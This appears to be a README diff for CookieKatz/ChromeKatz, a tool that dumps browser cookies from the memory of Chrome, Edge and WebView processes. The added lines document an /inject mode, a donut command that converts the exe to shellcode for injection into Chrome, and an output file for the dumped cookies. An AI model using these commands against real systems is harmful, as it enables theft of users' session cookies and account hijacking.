Meckazin/ChromeKatz/README.md

     Targets the given msedgewebview2 process .\CookieKatz.exe /list /webview
     Lists available webview processes
+.\CookieKatz.exe /inject
+    Targets the current process.
+Use this flag when your are injecting CookieKatz to Chrome process.

+TIP!
+If you need to inject CookieKatz into the Chrome process, you can turn the exe into shellcode using donut:
+    .\donut.exe -a 2 --input <Path_to_CookieKatz.exe> -z 4 -b 1 -p "/inject" -t

 Flags:
     /edge       Target current user Edge process
     /webview    Target current user Msedgewebview2 process
-    /pid        Attempt to dump given pid, for example, someone else's if running elevated /list       List targettable processes, use with /edge or /webview to target other browsers /help       This what you just did! -h works as well
+    /pid        Attempt to dump given pid, for example, someone else's if running elevated /list       List targettable processes, use with /edge or /webview to target other browsers /inject     Indicate that the process will run in the target process /out        Write output to file, default location is "C:\Users\Public\Documents\cookies.log" /help       This what you just did! -h works as well
 ```